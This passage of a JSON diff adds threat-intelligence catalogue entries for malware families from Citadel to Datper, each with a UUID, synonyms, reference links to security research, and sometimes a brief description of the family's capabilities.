"description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.citadel", + "https://blog.malwarebytes.com/threat-analysis/2012/11/citadel-a-cyber-criminals-ultimate-weapon/", + "http://www.xylibox.com/2016/02/citadel-0011-atmos.html", + "http://blog.jpcert.or.jp/2016/02/banking-trojan--27d6.html", + "https://www.arbornetworks.com/blog/asert/the-citadel-and-gameover-campaigns-of-5cb682c10440b2ebaf9f28c1fe438468/" + ] + }, + "uuid": "7f550cae-98b7-4a0c-bed2-d79227dc6310", + "value": "Citadel", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.client_maximus", + "https://securityintelligence.com/client-maximus-new-remote-overlay-malware-highlights-rising-malcode-sophistication-in-brazil/" + ] + }, + "uuid": "c2bd0771-55d6-4242-986d-4bfd735998ba", + "value": "Client Maximus", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cloud_duke", + "https://www.f-secure.com/weblog/archives/00002822.html" + ] + }, + "uuid": "40baac36-2fd0-49b3-b05b-1087d60f4f2c", + "value": "Cloud Duke", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmsbrute", + "https://securelist.com/the-shade-encryptor-a-double-threat/72087/" + ] + }, + "uuid": "ad960c5c-f2a1-405e-a32a-31f75b7c6859", + "value": "CMSBrute", + "description": "" + }, + { + "meta": { + "synonyms": [ + "meciv" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cmstar", + "https://researchcenter.paloaltonetworks.com/2016/03/digital-quartermaster-scenario-demonstrated-in-attacks-against-the-mongolian-government/", + "https://researchcenter.paloaltonetworks.com/2017/09/unit42-threat-actors-target-government-belarus-using-cmstar-trojan", + "https://twitter.com/ClearskySec/status/963829930776723461", + "https://www.votiro.com/single-post/2018/02/13/New-campaign-targeting-Ukrainians-holds-secrets-in-documents-properties" + ] + }, + "uuid": "e4e15ab4-9ba6-444a-b154-2854757e792e", + "value": "CMSTAR", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobalt_strike", + "https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks", + "https://www.fireeye.com/blog/threat-research/2017/06/phished-at-the-request-of-counsel.html", + "https://blog.cobaltstrike.com/2018/04/09/cobalt-strike-3-11-the-snake-that-eats-its-tail/", + "https://www.lac.co.jp/lacwatch/people/20180521_001638.html" + ] + }, + "uuid": "1a1d3ea4-972e-4c48-8d85-08d9db8f1550", + "value": "Cobalt Strike", + "description": "Cobalt Strike is a paid penetration testing product that allows an attacker to deploy an agent named 'Beacon' on the victim machine. Beacon includes a wealth of functionality to the attacker, including, but not limited to:\r\n\r\n* Execute commands\r\n* Log keystrokes\r\n* Upload/download files\r\n* SOCKS proxy\r\n* Privilege escalation\r\n* Mimikatz\r\n* Port scanning\r\n* Lateral Movement\r\n\r\nThe Beacon implant has become popular amongst targeted attackers and criminal users as it is well written, stable, and highly customizable." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobian_rat", + "https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat", + "https://securityaffairs.co/wordpress/62573/malware/cobian-rat-backdoor.html" + ] + }, + "uuid": "aa553bbd-f6e4-4774-9ec5-4607aa2004b8", + "value": "Cobian RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "COOLPANTS" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobint", + "https://www.proofpoint.com/us/threat-insight/post/new-modular-downloaders-fingerprint-systems-part-3-cobint", + "https://www.group-ib.com/blog/renaissance", + "https://asert.arbornetworks.com/double-the-infection-double-the-fun/" + ] + }, + "uuid": "23160942-6de6-41c0-8d8c-44876191c3f0", + "value": "CobInt", + "description": "CobInt, is a self-developed backdoor of the Cobalt group. The modular tool has capabilities to collect initial intelligence information about the compromised machine and stream video from its desktop. If the operator decides that the system is of interest, the backdoor will download and launch CobaltStrike framework stager." + }, + { + "meta": { + "synonyms": [ + "Carbon" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cobra", + "https://blog.gdatasoftware.com/2015/01/23926-analysis-of-project-cobra", + "https://www.melani.admin.ch/dam/melani/de/dokumente/2016/technical%20report%20ruag.pdf.download.pdf/Report_Ruag-Espionage-Case.pdf", + "https://securelist.com/analysis/publications/65545/the-epic-turla-operation/", + "https://www.welivesecurity.com/2017/03/30/carbon-paper-peering-turlas-second-stage-backdoor/", + "https://github.com/hfiref0x/TDL" + ] + }, + "uuid": "f75452f3-6a4a-4cd6-b3e0-089fa320e9b9", + "value": "Cobra Carbon System", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cockblocker", + "https://twitter.com/JaromirHorejsi/status/817311664391524352" + ] + }, + "uuid": "77e85a95-6a78-4255-915a-488eb73ee82f", + "value": "CockBlocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.codekey", + "https://www.rsa.com/content/dam/pdfs/2-2017/kingslayer-a-supply-chain-attack.pdf" + ] + }, + "uuid": "cb5bad79-707c-493d-8a2b-4c0be38301c5", + "value": "CodeKey", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cohhoc", + "https://public.gdatasoftware.com/Presse/Publikationen/Whitepaper/EN/GDATA_TooHash_CaseStudy_102014_EN_v1.pdf" + ] + }, + "uuid": "9481d7b1-307c-4504-9333-21720b85317b", + "value": "Cohhoc", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coinminer", + "https://secrary.com/ReversingMalware/CoinMiner/", + "https://blog.malwarebytes.com/threat-analysis/2018/01/a-coin-miner-with-a-heavens-gate/amp/" + ] + }, + "uuid": "333e2e87-b9b0-4e2e-9ed9-7259c55a93db", + "value": "Coinminer", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Bandios", + "GrayBird" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.colony", + "https://twitter.com/anyrun_app/status/976385355384590337", + "https://secrary.com/ReversingMalware/Colony_Bandios/", + "https://pastebin.com/GtjBXDmz" + ] + }, + "uuid": "4db94d24-209a-4edd-b175-3a3085739b94", + "value": "Colony", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.combojack", + "https://researchcenter.paloaltonetworks.com/2018/03/unit42-sure-ill-take-new-combojack-malware-alters-clipboards-steal-cryptocurrency/" + ] + }, + "uuid": "150cde2c-ae36-4fa5-8d8d-8dedc3de43de", + "value": "Combojack", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.combos", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "2b71a966-da08-4467-a785-cb6abf2fa65e", + "value": "Combos", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.comodosec", + "https://techhelplist.com/down/malware-ransom-comodosec-mrcr1.txt" + ] + }, + "uuid": "bdecbbe9-7646-40cd-a9f3-86a20b13e6da", + "value": "ComodoSec", + "description": "" + }, + { + "meta": { + "synonyms": [ + "lojack" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.computrace", + "https://asert.arbornetworks.com/lojack-becomes-a-double-agent/", + "https://bartblaze.blogspot.de/2014/11/thoughts-on-absolute-computrace.html", + "https://www.absolute.com/en/resources/faq/absolute-response-to-arbor-lojack-research", + "https://www.lastline.com/labsblog/apt28-rollercoaster-the-lowdown-on-hijacked-lojack/" + ] + }, + "uuid": "d24882f9-8645-4f6a-8a86-2f85daaad685", + "value": "Computrace", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.comrade_circle", + "https://twitter.com/struppigel/status/816926371867926528" + ] + }, + "uuid": "634f1977-6cba-4ad7-9501-09e1eaefde56", + "value": "ComradeCircle", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.concealment_troy", + "https://www.mcafee.com/enterprise/en-us/assets/white-papers/wp-dissecting-operation-troy.pdf", + "http://www.malware-reversing.com/2013/04/5-south-korea-incident-new-malware.html" + ] + }, + "uuid": "db370ffc-c3d2-42fc-b45b-f777d69f98c5", + "value": "concealment_troy", + "description": "" + }, + { + "meta": { + "synonyms": [ + "downadup", + "traffic converter" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.conficker", + "http://contagiodump.blogspot.com/2009/05/win32conficker.html" + ] + }, + "uuid": "5f638985-49e1-4059-b2eb-f2ffa397b212", + "value": "Conficker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.confucius", + "https://researchcenter.paloaltonetworks.com/2016/09/unit42-confucius-says-malware-families-get-further-by-abusing-legitimate-websites/", + "https://researchcenter.paloaltonetworks.com/2017/11/unit42-recent-inpage-exploits-lead-multiple-malware-families/" + ] + }, + "uuid": "fe43c7e6-1d62-4421-9d85-519f53e8073f", + "value": "Confucius", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.contopee", + "https://www.symantec.com/connect/blogs/swift-attackers-malware-linked-more-financial-attacks" + ] + }, + "uuid": "4181ebb5-cce9-4fb1-81a1-c3f34cb643de", + "value": "Contopee", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cookiebag", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "9afa9b7e-e2c1-4725-8d8d-cec7933cc63b", + "value": "CookieBag", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.corebot", + "https://www.arbornetworks.com/blog/asert/wp-content/uploads/2016/02/ASERT-Threat-Intelligence-Brief-2016-02-Corebot-1.pdf", + "https://malwarebreakdown.com/2017/09/11/re-details-malspam-downloads-corebot-banking-trojan/", + "http://blog.deepinstinct.com/2017/11/08/a-deeper-dive-into-corebots-comeback/" + ] + }, + "uuid": "495377c4-1be5-4c65-ba66-94c221061415", + "value": "Corebot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.coreshell", + "https://contagiodump.blogspot.de/2017/02/russian-apt-apt28-collection-of-samples.html", + "http://www2.fireeye.com/rs/fireye/images/rpt-apt28.pdf", + "http://malware.prevenity.com/2014/08/malware-info.html", + "http://www.malware-reversing.com/2012/12/3-disclosure-of-another-0day-malware.html" + ] + }, + "uuid": "579cc23d-4ba4-419f-bf8a-f235ed33125e", + "value": "Coreshell", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cradlecore", + "https://blogs.forcepoint.com/security-labs/cradlecore-ransomware-source-code-sale" + ] + }, + "uuid": "6fb5bfff-4b10-43a4-ad3c-a1578f39e83e", + "value": "CradleCore", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Crash", + "Industroyer" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crashoverride", + "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf", + "https://www.welivesecurity.com/2017/06/12/industroyer-biggest-threat-industrial-control-systems-since-stuxnet/", + "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + ] + }, + "uuid": "610d5ce7-c9c8-4fb1-94d9-69b7cb5397b6", + "value": "CrashOverride", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.credraptor", + "http://www.welivesecurity.com/2016/12/13/rise-telebots-analyzing-disruptive-killdisk-attacks/" + ] + }, + "uuid": "ac75d0a3-bb99-4453-9567-a6c8ba87a706", + "value": "Credraptor", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crenufs" + ] + }, + "uuid": "e8682902-7748-423a-8ba9-6f00d9fe7331", + "value": "Crenufs", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crimson", + "https://www.amnesty.org/download/Documents/ASA3383662018ENGLISH.PDF" + ] + }, + "uuid": "a61fc694-a88a-484d-a648-db35b49932fd", + "value": "Crimson", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crisis", + "http://contagiodump.blogspot.com/2012/12/aug-2012-w32crisis-and-osxcrisis-jar.html", + "https://www.symantec.com/connect/blogs/crisis-windows-sneaks-virtual-machines", + "https://www.intego.com/mac-security-blog/new-apple-mac-trojan-called-osxcrisis-discovered-by-intego-virus-team/?" + ] + }, + "uuid": "4b2ab902-811e-4b50-8510-43454d77d027", + "value": "Crisis", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryakl", + "https://hackmag.com/security/ransomware-russian-style/", + "https://securelist.ru/shifrovalshhik-cryakl-ili-fantomas-razbushevalsya/24070/", + "https://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Cryakl-B/detailed-analysis.aspx", + "https://www.v3.co.uk/v3-uk/news/3026414/belgian-police-release-decryption-keys-for-cryakl-ransomware", + "https://twitter.com/demonslay335/status/971164798376468481" + ] + }, + "uuid": "32fa6c53-b4fc-47f8-894c-1ea74180e02f", + "value": "Cryakl", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crylocker" + ] + }, + "uuid": "980ea9fa-d29d-4a44-bb87-0c050f8ddeaf", + "value": "CryLocker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypmic", + "https://blog.trendmicro.com/trendlabs-security-intelligence/crypmic-ransomware-wants-to-follow-cryptxxx/", + "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" + ] + }, + "uuid": "2fe1dd8c-23d8-40a6-b042-bd2c4012fea6", + "value": "CrypMic", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypt0l0cker", + "http://blog.talosintelligence.com/2017/08/first-look-crypt0l0cker.html" + ] + }, + "uuid": "38b38f8c-944d-4062-bf35-561e8a81c8d2", + "value": "Crypt0l0cker", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptolocker", + "https://www.secureworks.com/research/cryptolocker-ransomware", + "https://www.justice.gov/opa/pr/us-leads-multi-national-action-against-gameover-zeus-botnet-and-cryptolocker-ransomware" + ] + }, + "uuid": "c5a783da-9ff3-4427-84c5-428480b21cc7", + "value": "CryptoLocker", + "description": "CryptoLocker is a new sophisticated malware that was launched in the late 2013. It is designed to attack Windows operating system by encrypting all the files from the system using a RSA-2048 public key. To decrypt the mentioned files, the user has to pay a ransom (usually 300 USD/EUR) or 2 BitCoins." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoluck", + "http://www.bleepingcomputer.com/news/security/cryptoluck-ransomware-being-malvertised-via-rig-e-exploit-kits/" + ] + }, + "uuid": "3ec67717-acd5-401b-8e9f-47e79edd07a0", + "value": "CryptoLuck", + "description": "" + }, + { + "meta": { + "synonyms": [ + "CryptFile2" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptomix", + "https://www.cert.pl/en/news/single/technical-analysis-of-cryptomixcryptfile2-ransomware/", + "https://www.bleepingcomputer.com/news/security/work-cryptomix-ransomware-variant-released/" + ] + }, + "uuid": "55d5742e-20f5-4c9a-887a-4dbd5b37d921", + "value": "CryptoMix", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptorium", + "https://twitter.com/struppigel/status/810770490491043840" + ] + }, + "uuid": "b7240444-94a6-4d57-a6b3-ca38182eff7a", + "value": "Cryptorium", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield", + "https://www.bleepingcomputer.com/news/security/revenge-ransomware-a-cryptomix-variant-being-distributed-by-rig-exploit-kit/", + "http://www.broadanalysis.com/2017/03/14/rig-exploit-kit-via-the-eitest-delivers-cryptoshieldrevenge-ransomware/" + ] + }, + "uuid": "6855c491-1b18-4414-9e78-8bc17f0b5b98", + "value": "CryptoShield", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshuffler", + "https://www.bleepingcomputer.com/news/security/cryptoshuffler-stole-150-000-by-replacing-bitcoin-wallet-ids-in-pc-clipboards/" + ] + }, + "uuid": "87048a24-7339-4d4e-a141-661cd32a6f1d", + "value": "CryptoShuffler", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowall" + ] + }, + "uuid": "1cb63b32-cc65-4cdc-945a-e06a88cdd94b", + "value": "Cryptowall", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptowire", + "https://www.bleepingcomputer.com/news/security/-proof-of-concept-cryptowire-ransomware-spawns-lomix-and-ultralocker-families/" + ] + }, + "uuid": "bc0c1e48-102c-4e6b-9b86-c442c4798159", + "value": "CryptoWire", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_fortress", + "https://www.welivesecurity.com/2015/03/09/cryptofortress-mimics-torrentlocker-different-ransomware/", + "https://www.lexsi.com/securityhub/cryptofortress/?lang=en", + "http://malware.dontneedcoffee.com/2015/03/cryptofortress-teeraca-aka.html" + ] + }, + "uuid": "ae4aa1ef-4da0-4952-9583-9d47f84edad9", + "value": "CryptoFortress", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.crypto_ransomeware", + "https://twitter.com/JaromirHorejsi/status/818369717371027456" + ] + }, + "uuid": "2f65f056-6cba-4a5b-9aaf-daf31eb76fc2", + "value": "CryptoRansomeware", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptxxxx", + "https://www.cert.pl/news/single/cryptxxx-crypmic-ransomware-dystrybuowany-ramach-exploit-kitow/" + ] + }, + "uuid": "fd54ff8b-d34a-4a58-9ee1-2c47f28cb3e8", + "value": "CryptXXXX", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.csext", + "https://www.cylance.com/content/dam/cylance/pages/operation-cleaver/Cylance_Operation_Cleaver_Report.pdf" + ] + }, + "uuid": "c6a46f63-3ff1-4952-8350-fad9816b45c9", + "value": "CsExt", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Windshield?" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cuegoe", + "https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html", + "https://www.eff.org/deeplinks/2014/01/vietnamese-malware-gets-personal", + "http://blog.malwaremustdie.org/2014/08/another-country-sponsored-malware.html", + "http://www.kernelmode.info/forum/viewtopic.php?f=16&t=3451" + ] + }, + "uuid": "1dc53eb8-ffae-4823-9c11-3c01514398b9", + "value": "Cuegoe", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cueisfry", + "https://www.secureworks.com/blog/apt-campaign-leverages-the-cueisfry-trojan-and-microsoft-word-vulnerability-cve-2014-1761" + ] + }, + "uuid": "64d40102-c296-4a85-9b9c-b3afb6d58e09", + "value": "Cueisfry", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutlet", + "http://www.vkremez.com/2017/12/lets-learn-cutlet-atm-malware-internals.html" + ] + }, + "uuid": "8945d785-9d43-49ee-b210-4adeb8a24ab9", + "value": "Cutlet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cutwail" + ] + }, + "uuid": "9e8655fc-5bba-4efd-b3c0-db89ee2e0e0b", + "value": "Cutwail", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Rebhip" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cybergate", + "https://www.endgame.com/blog/technical-blog/ten-process-injection-techniques-technical-survey-common-and-trending-process" + ] + }, + "uuid": "062d8577-d6e6-4c97-bcac-eb6eb1a50a8d", + "value": "CyberGate", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cyber_splitter" + ] + }, + "uuid": "8bde6075-8c5b-4ff1-be9a-4e2b1d3419aa", + "value": "CyberSplitter", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.cycbot", + "https://www.welivesecurity.com/2011/07/14/cycbot-ready-to-ride/" + ] + }, + "uuid": "dcdd98a7-aad2-4a96-a787-9c4665bbb1b8", + "value": "CycBot", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.dairy", + "https://github.com/securitykitten/malware_references/blob/master/Appendix%20C%20(Digital)%20-%20The%20Malware%20Arsenal.pdf" + ] + }, + "uuid": "92960f1f-5099-4e38-a177-14a5e3b8d601", + "value": "Dairy", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.danabot", + "https://0ffset.wordpress.com/2018/06/05/post-0x08-analyzing-danabot-downloader/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-new-banking-trojan-surfaces-down-under-0", + "https://www.trustwave.com/Resources/SpiderLabs-Blog/DanaBot-Riding-Fake-MYOB-Invoice-Emails/", + "https://www.proofpoint.com/us/threat-insight/post/danabot-gains-popularity-and-targets-us-organizations-large-campaigns", + "https://www.welivesecurity.com/2018/09/21/danabot-targeting-europe-adds-new-features/" + ] + }, + "uuid": "4f7decd4-054b-4dd7-89cc-9bdb248f7c8a", + "value": "DanaBot", + "description": "Proofpoints describes DanaBot as the latest example of malware focused on persistence and stealing useful information that can later be monetized rather than demanding an immediate ransom from victims. The social engineering in the low-volume DanaBot campaigns we have observed so far has been well-crafted, again pointing to a renewed focus on “quality over quantity” in email-based threats. DanaBot’s modular nature enables it to download additional components, increasing the flexibility and robust stealing and remote monitoring capabilities of this banker. " + }, + { + "meta": { + "synonyms": [ + "Fynloski", + "klovbot" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkcomet", + "https://blog.malwarebytes.com/threat-analysis/2012/06/you-dirty-rat-part-1-darkcomet/", + "https://blog.malwarebytes.com/threat-analysis/2012/10/dark-comet-2-electric-boogaloo/", + "https://darkcomet.net", + "http://contagiodump.blogspot.com/2012/06/rat-samples-from-syrian-targeted.html" + ] + }, + "uuid": "5086a6e0-53b2-4d96-9eb3-a0237da2e591", + "value": "DarkComet", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmegi", + "http://contagiodump.blogspot.com/2012/04/this-is-darkmegie-rootkit-sample-kindly.html", + "http://stopmalvertising.com/rootkits/analysis-of-darkmegi-aka-npcdark.html" + ] + }, + "uuid": "3521faaa-1136-4e50-9fe2-3f33359e8b1d", + "value": "DarkMegi", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Chymine" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkmoon", + "http://contagiodump.blogspot.com/2010/01/jan-17-trojan-darkmoonb-exe-haiti.html", + "http://contagiodump.blogspot.com/2010/07/cve-2010-2568-keylogger-win32chyminea.html", + "https://www.f-secure.com/v-descs/trojan-downloader_w32_chymine_a.shtml" + ] + }, + "uuid": "81ca4876-b4a4-43e9-b8a9-8a88709dd3d2", + "value": "Darkmoon", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkpulsar", + "https://labs.nettitude.com/blog/a-quick-analysis-of-the-latest-shadow-brokers-dump/" + ] + }, + "uuid": "1aecd6eb-80e2-4598-8504-d93f69c7a8f0", + "value": "DarkPulsar", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkshell", + "https://www.arbornetworks.com/blog/asert/darkshell-a-ddos-bot-targetting-vendors-of-industrial-food-processing-equipment/" + ] + }, + "uuid": "7fcb9d77-a685-4705-86f0-e62a7302e836", + "value": "DarkShell", + "description": "DarkShell is a DDoS bot seemingly of Chinese origin, discovered in 2011. During 2011, DarkShell was reported to target the industrial food processing industry." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darksky", + "https://blog.radware.com/security/2018/02/darksky-botnet/", + "http://telegra.ph/Analiz-botneta-DarkSky-12-30", + "https://github.com/ims0rry/DarkSky-botnet" + ] + }, + "uuid": "d5f2e3c4-adf4-4156-98b1-b207f70522bb", + "value": "Darksky", + "description": "DarkSky is a botnet that is capable of downloading malware, conducting a number of network and application-layer distributed denial-of-service (DDoS) attacks, and detecting and evading security controls, such as sandboxes and virtual machines. It is advertised for sale on the dark web for $20. Much of the malware that DarkSky has available to download onto targeted systems is associated with cryptocurrency-mining activity. The DDoS attacks that DarkSky can perform include DNS amplification attacks, TCP (SYN) flood, UDP flood, and HTTP flood. The botnet can also perform a check to determine whether or not the DDoS attack succeeded and turn infected systems into a SOCKS/HTTP proxy to route traffic to a remote server." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darkstrat", + "https://www.welivesecurity.com/2014/11/12/korplug-military-targeted-attacks-afghanistan-tajikistan/" + ] + }, + "uuid": "b9692126-e6e9-4ab3-8494-959fd1269ff4", + "value": "DarkStRat", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktequila", + "https://securelist.com/dark-tequila-anejo/87528/" + ] + }, + "uuid": "374080b4-5e6c-4992-a7f5-def1f2975494", + "value": "DarkTequila", + "description": "Dark Tequila is a complex malicious campaign targeting Mexican users, with the primary purpose of stealing financial information, as well as login credentials to popular websites that range from code versioning repositories to public file storage accounts and domain registrars." + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.darktrack_rat", + "http://news.softpedia.com/news/free-darktrack-rat-has-the-potential-of-being-the-best-rat-on-the-market-508179.shtml", + "https://nioguard.blogspot.de/2017/05/targeted-attack-against-ukrainian.html" + ] + }, + "uuid": "fc91803f-610c-4ad5-ba0c-b78d65abc6db", + "value": "Darktrack RAT", + "description": "" + }, + { + "meta": { + "synonyms": [ + "Muirim", + "Nioupale" + ], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.daserf", + "https://researchcenter.paloaltonetworks.com/2017/07/unit42-tick-group-continues-attacks/", + "http://blog.trendmicro.com/trendlabs-security-intelligence/redbaldknight-bronze-butler-daserf-backdoor-now-using-steganography/", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses" + ] + }, + "uuid": "70f6c71f-bc0c-4889-86e3-ef04e5b8415b", + "value": "Daserf", + "description": "" + }, + { + "meta": { + "synonyms": [], + "type": [], + "refs": [ + "https://malpedia.caad.fkie.fraunhofer.de/details/win.datper", + "https://www.secureworks.com/research/bronze-butler-targets-japanese-businesses", + 